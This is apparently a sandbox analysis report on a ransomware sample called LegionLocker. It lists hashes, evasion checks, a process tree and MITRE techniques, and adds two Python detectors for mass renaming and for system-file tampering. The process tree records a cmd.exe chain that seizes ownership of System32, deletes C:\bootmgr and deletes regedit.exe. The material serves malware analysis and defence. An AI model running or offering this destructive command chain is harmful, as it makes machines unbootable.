Analysis
- max time kernel: 140s
- max time network: 120s
- platform: windows7_x64
- resource: win7-20240708-en
- resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
- submitted: 05-11-2024 12:23

Behavioral task: behavioral1
- Sample: Ransomware LegionLocker.exe
- Resource: win7-20240708-en

General
- Target: Ransomware LegionLocker.exe
- Size: 3.1MB
- MD5: 6a85d0ba4d1db63d390b7a071d60e0ef
- SHA1: 79a32ee067e19b43bc3f29fde3a3ff95986f8e2e
- SHA256: 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412
- SHA512: 16a97e39d6a373c3eb7140c93fd61afd12a7569d262ee67a47ac548cffc5735379dee85ba68dabb9a0aa768e5505fe6a451fd08aae68006aa1962b2861c8a6ce
- SSDEEP: 49152:uZik4UvxXDFSuvXKWC9BKtKkd1UOe65qeVyODIaihosmrcvCM97Wd84T3D:YGuDppmT+Be6bymIhoBcaY6d84jD
Malware Config
Extracted from: C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\HOW-TO-DECRYPT.TXT
- http://mail2tor2zyjdctd.onion/
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
- Ransomware LegionLocker.exe: Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Renames multiple (153) files with added filename extension
Appending a new extension to a large number of files in one run is the file-system footprint of ransomware encrypting the files it can reach; the count is what was observed within the run's time limit.
-
Disables Task Manager via registry modification
-
Possible privilege escalation attempt 5 IoCs
Processes (pid, process):
- 2220 takeown.exe
- 2284 icacls.exe
- 588 takeown.exe
- 636 icacls.exe
- 844 takeown.exe
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
- Ransomware LegionLocker.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
- Ransomware LegionLocker.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
Modifies file permissions 1 TTPs 5 IoCs
Processes (pid, process):
- 2220 takeown.exe
- 2284 icacls.exe
- 588 takeown.exe
- 636 icacls.exe
- 844 takeown.exe
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer detected (YARA rule: themida) 2 IoCs
Resources (resource, yara_rule):
- behavioral1/memory/1724-28-0x0000000000F60000-0x0000000001790000-memory.dmp: themida
- behavioral1/memory/1724-29-0x0000000000F60000-0x0000000001790000-memory.dmp: themida
Checks whether UAC is enabled 1 IoCs
Processes:
- Ransomware LegionLocker.exe: Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes (pid, process):
- 1724 Ransomware LegionLocker.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
- Ransomware LegionLocker.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
- cmd.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
- takeown.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
- icacls.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
- takeown.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
- icacls.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
- takeown.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Six of the seven IoCs come from cmd.exe and the built-in takeown/icacls utilities it spawned, which open this key as part of their normal startup; only the entry for the sample itself is evidence of deliberate discovery, and this signature is weak on its own.
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes (description, pid, process):
- Token: SeDebugPrivilege 1724 Ransomware LegionLocker.exe
- Token: SeDebugPrivilege 1724 Ransomware LegionLocker.exe
- Token: SeTakeOwnershipPrivilege 2220 takeown.exe
- Token: SeTakeOwnershipPrivilege 588 takeown.exe
- Token: SeTakeOwnershipPrivilege 844 takeown.exe
Suspicious use of WriteProcessMemory 24 IoCs
Processes (each parent/child pair was recorded four times, 6 × 4 = 24):
- PID 1724 (Ransomware LegionLocker.exe) wrote to memory of 1908 (cmd.exe) ×4
- PID 1908 (cmd.exe) wrote to memory of 2220 (takeown.exe) ×4
- PID 1908 (cmd.exe) wrote to memory of 2284 (icacls.exe) ×4
- PID 1908 (cmd.exe) wrote to memory of 588 (takeown.exe) ×4
- PID 1908 (cmd.exe) wrote to memory of 636 (icacls.exe) ×4
- PID 1908 (cmd.exe) wrote to memory of 844 (takeown.exe) ×4
Every pair matches a parent/child relationship in the process tree, so these writes are a parent populating a child it has just created rather than injection into an unrelated process.
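Added example (Python, written for this page, not code from the sandbox or from the sample): a detection heuristic for the "renames multiple files with added filename extension" behaviour flagged above. It runs over constructed file-rename events (the `.locked` extension, the PIDs other than 1724, the paths and the timing are all made up for the demonstration; the report does not disclose the sample's real extension) and alerts when one process appends an extension to at least THRESHOLD files inside a sliding time window. That combination is what separates encryption-by-rename from a user renaming a few files or an editor's save-by-rename, which also shows up as a rename event.

```python
import ntpath
from collections import Counter, defaultdict

THRESHOLD = 20   # appended-extension renames by one PID ...
WINDOW_S = 60.0  # ... within this many seconds trips the alert

# Constructed events, not taken from the report: (timestamp_s, pid, image, old_path, new_path).
# ".locked" is a placeholder extension; the sample's real extension is not given on the page.
EVENTS = [
    (100.0 + i * 0.25, 1724, "Ransomware LegionLocker.exe",
     f"C:\\Users\\Admin\\Documents\\report{i:03d}.docx",
     f"C:\\Users\\Admin\\Documents\\report{i:03d}.docx.locked")
    for i in range(40)
] + [
    # Benign noise: an editor's save-by-rename, a user renaming a photo, one manual .bak copy.
    (101.0, 2000, "WINWORD.EXE",
     "C:\\Users\\Admin\\Documents\\~WRD0001.tmp", "C:\\Users\\Admin\\Documents\\notes.docx"),
    (102.0, 3000, "explorer.exe",
     "C:\\Users\\Admin\\Pictures\\IMG_1.jpg", "C:\\Users\\Admin\\Pictures\\holiday.jpg"),
    (103.0, 3000, "explorer.exe",
     "C:\\Users\\Admin\\Pictures\\a.jpg", "C:\\Users\\Admin\\Pictures\\a.jpg.bak"),
]


def appended_extension(old_path, new_path):
    """Return the extension appended by a rename, or None when the rename is not an append.

    Only same-directory renames whose new name is the old name plus ".something" count;
    a move, a rename to a different stem, or a suffix without a dot is ignored.
    """
    old_dir, old_name = ntpath.split(old_path)
    new_dir, new_name = ntpath.split(new_path)
    if old_dir.lower() != new_dir.lower() or new_name == old_name:
        return None
    if not new_name.lower().startswith(old_name.lower()):
        return None
    suffix = new_name[len(old_name):]
    return suffix if suffix.startswith(".") and len(suffix) > 1 else None


def detect_mass_rename(events, threshold=THRESHOLD, window_s=WINDOW_S):
    """Sliding-window count of appended-extension renames per PID; at most one alert per PID."""
    per_pid = defaultdict(list)
    for ts, pid, image, old, new in sorted(events):
        ext = appended_extension(old, new)
        if ext is not None:
            per_pid[pid].append((ts, image, ext))

    alerts = []
    for pid, recs in per_pid.items():
        start = 0
        for end in range(len(recs)):
            while recs[end][0] - recs[start][0] > window_s:
                start += 1
            if end - start + 1 >= threshold:
                alerts.append({
                    "pid": pid,
                    "image": recs[end][1],
                    "renames": len(recs),            # total appended renames seen for this PID
                    "extension": Counter(r[2] for r in recs).most_common(1)[0][0],
                    "tripped_at": recs[end][0],      # timestamp of the rename that crossed the threshold
                })
                break
    return alerts


if __name__ == "__main__":
    for alert in detect_mass_rename(EVENTS):
        print(alert)
```

The threshold and window are tuning knobs: 20 files in 60 seconds catches an encryptor early in its run while leaving a user's occasional `.bak` rename alone; a backup tool that legitimately appends extensions would need an image-based allow-list on top of this.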
Processes
- C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe (PID 1724)
  Command line: "C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\cmd.exe (PID 1908)
    Command line: "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && Exit
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\takeown.exe (PID 2220)
      Command line: takeown /f C:\Windows\System32
      - Possible privilege escalation attempt
      - Modifies file permissions
      - System Location Discovery: System Language Discovery
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\icacls.exe (PID 2284)
      Command line: icacls C:\Windows\System32 /grant Admin:F
      - Possible privilege escalation attempt
      - Modifies file permissions
      - System Location Discovery: System Language Discovery
    - C:\Windows\SysWOW64\takeown.exe (PID 588)
      Command line: takeown /f C:\Windows\System32\drivers
      - Possible privilege escalation attempt
      - Modifies file permissions
      - System Location Discovery: System Language Discovery
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\icacls.exe (PID 636)
      Command line: icacls C:\Windows\System32\drivers /grant Admin:F
      - Possible privilege escalation attempt
      - Modifies file permissions
      - System Location Discovery: System Language Discovery
    - C:\Windows\SysWOW64\takeown.exe (PID 844)
      Command line: takeown /f C:\Windows\System32\LogonUI.exe
      - Possible privilege escalation attempt
      - Modifies file permissions
      - System Location Discovery: System Language Discovery
      - Suspicious use of AdjustPrivilegeToken

Notes on the tree: %username% expanded to Admin, as the recorded icacls child command lines show. Only the first five commands of the chain appear as child processes; the icacls for LogonUI.exe and the bootmgr and regedit.exe steps (including the two del commands) are absent from the capture. Because cmd joins the commands with &&, a non-zero exit code from any step ends the remainder of the chain; whether the takeown on LogonUI.exe failed or the run simply reached its time limit cannot be told from this listing. The utilities run from SysWOW64 because the 32-bit sample (tagged arch:x86) resolves C:\Windows\System32\cmd.exe through WoW64 file-system redirection.
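Added example (Python, written for this page, not part of the sandbox report): parsing the cmd.exe command line recorded for PID 1908 into its individual commands and judging the takeown, icacls /grant ...:F, attrib and del sequence against protected system paths, which is the "Modifies file permissions" / "Possible privilege escalation attempt" behaviour the report flags. The protected-path list, the boot-critical set and the verdict names are my own choices; the environment map that expands %username% to Admin mirrors what the recorded icacls child command lines show.

```python
import re

# Command line recorded for cmd.exe (PID 1908) in the process tree above.
CMDLINE = (
    r'"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && '
    r'icacls C:\Windows\System32 /grant %username%:F && '
    r'takeown /f C:\Windows\System32\drivers && '
    r'icacls C:\Windows\System32\drivers /grant %username%:F && '
    r'takeown /f C:\Windows\System32\LogonUI.exe && '
    r'icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && '
    r'takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && '
    r'attrib -s -r -h C:\bootmgr && del C:\bootmgr && '
    r'takeown /f C:\Windows\regedit.exe && '
    r'icacls C:\Windows\regedit.exe /grant %username%:F && '
    r'del C:\Windows\regedit.exe && Exit'
)

# Assumed (my choice): locations a user-land process has no business taking ownership of.
PROTECTED_PREFIXES = ("c:\\windows\\", "c:\\bootmgr")
# Assumed (my choice): files whose deletion leaves the machine unbootable.
BOOT_CRITICAL = {"c:\\bootmgr"}


def split_chain(cmdline):
    """Return the commands after cmd's /k or /c switch, split on the &&, || and & operators."""
    m = re.search(r"\s/[kKcC]\s+(.*)$", cmdline)
    body = m.group(1) if m else cmdline
    return [part for part in re.split(r"\s*(?:&&|\|\||&)\s*", body) if part]


def expand_env(cmd, env):
    """Expand %VAR% references the way cmd.exe would (variable names are case-insensitive)."""
    return re.sub(r"%(\w+)%", lambda m: env.get(m.group(1).lower(), m.group(0)), cmd)


def is_protected(path):
    return path.strip('"').lower().startswith(PROTECTED_PREFIXES)


def classify(cmd):
    """Map one command to the kind of tampering it performs and the file it targets."""
    tokens = cmd.split()
    lowered = [t.lower() for t in tokens]
    verb = lowered[0]
    if verb == "takeown" and "/f" in lowered:
        return {"verb": verb, "target": tokens[lowered.index("/f") + 1], "class": "ownership_change"}
    if verb == "icacls":
        principal = rights = None
        if "/grant" in lowered:
            principal, _, rights = tokens[lowered.index("/grant") + 1].rpartition(":")
        cls = "acl_full_control_grant" if rights and rights.upper() == "F" else "acl_change"
        return {"verb": verb, "target": tokens[1], "class": cls, "principal": principal}
    if verb == "attrib":
        flags = [t for t in tokens[1:] if t[0] in "+-"]
        files = [t for t in tokens[1:] if t[0] not in "+-"]
        cls = "attribute_strip" if any(f.startswith("-") for f in flags) else "attribute_set"
        return {"verb": verb, "target": files[0] if files else None, "class": cls}
    if verb in ("del", "erase"):
        return {"verb": verb, "target": tokens[-1], "class": "delete"}
    return {"verb": verb, "target": None, "class": "other"}


def assess(cmdline, env):
    """Classify every command in the chain and reduce the protected-path hits to one verdict."""
    findings = []
    for raw in split_chain(cmdline):
        f = classify(expand_env(raw, env))
        f["protected"] = bool(f["target"]) and is_protected(f["target"])
        findings.append(f)
    hits = {f["class"] for f in findings if f["protected"]}
    deleted = {f["target"].strip('"').lower() for f in findings
               if f["protected"] and f["class"] == "delete"}
    # takeown followed by icacls /grant <user>:F on a protected path does not occur in normal
    # use; a del of a boot-critical file on top of it turns tampering into destruction.
    if {"ownership_change", "acl_full_control_grant"} <= hits:
        verdict = "system_file_destruction" if deleted & BOOT_CRITICAL else "system_file_tampering"
    else:
        verdict = "benign"
    return findings, verdict


if __name__ == "__main__":
    findings, verdict = assess(CMDLINE, {"username": "Admin"})
    for f in findings:
        print(f)
    print(verdict)
```

Running it on the recorded command line yields 14 commands and the destruction verdict; the same assessment on an icacls grant under the user's own profile comes back benign, which is the false-positive case a rule keyed on "icacls.exe spawned" alone would get wrong.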
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
- File and Directory Permissions Modification (1)
- Virtualization/Sandbox Evasion (1)
Credential Access
- Credentials from Password Stores (1)
  - Credentials from Web Browsers (1)
- Unsecured Credentials (1)
  - Credentials In Files (1)
Downloads
- Filesize: 1KB
  MD5: f2bbb85d6112bd7360a4ddbc23ea9a8b
  SHA1: 683eb7b2b0a5904337f204f71d25c02b9cc5daba
  SHA256: be548e310dab08ae249c6d20ba64034d4f3568365d4d31e1f1262abb6c3f33f2
  SHA512: a2bae503e9d18fc9bf1e981d2ec074f389a11e51e385f8701a14bc580c95b6c5f907baf9c7bf55e610d1582951fe7d93121b154fe532df6699389a77fcf6b172
- Filesize: 16B
  MD5: 2caa6f3c95f6ec6bba5b54344938efa0
  SHA1: 2d5637f50e858fbaaeec7853d944dd3c3e91ec39
  SHA256: 16ef853f2adc432c54ad75d0db8169be845065f65b6c5136eaafdcbe698ac1e6
  SHA512: 4141715b1d3a28a5fae1e3a1613cca697d07e24808da2b679abc5235d5a181799f35a0ce090ead8dcc133c3b7b7435b9805a3b9bc5eaca4f7167dab7c93d3e00
- Filesize: 11KB
  MD5: 98320b7eb431a4d989a4cd3031e723b9
  SHA1: 7b59bc263c75bf899d4302d236b1c3806d87e3d1
  SHA256: 6591551d4d97286fb4d1af05cf82289fe0ef690b46c52e88458cf1d8d8ef580b
  SHA512: 27487d804f4162ef39bd0bdeccfe6b927b40ee2fea612af35982ff72a37ce823651d04a0037814fd63b3e71c28082196f2f3d31eb916e3bef6cf937804db9167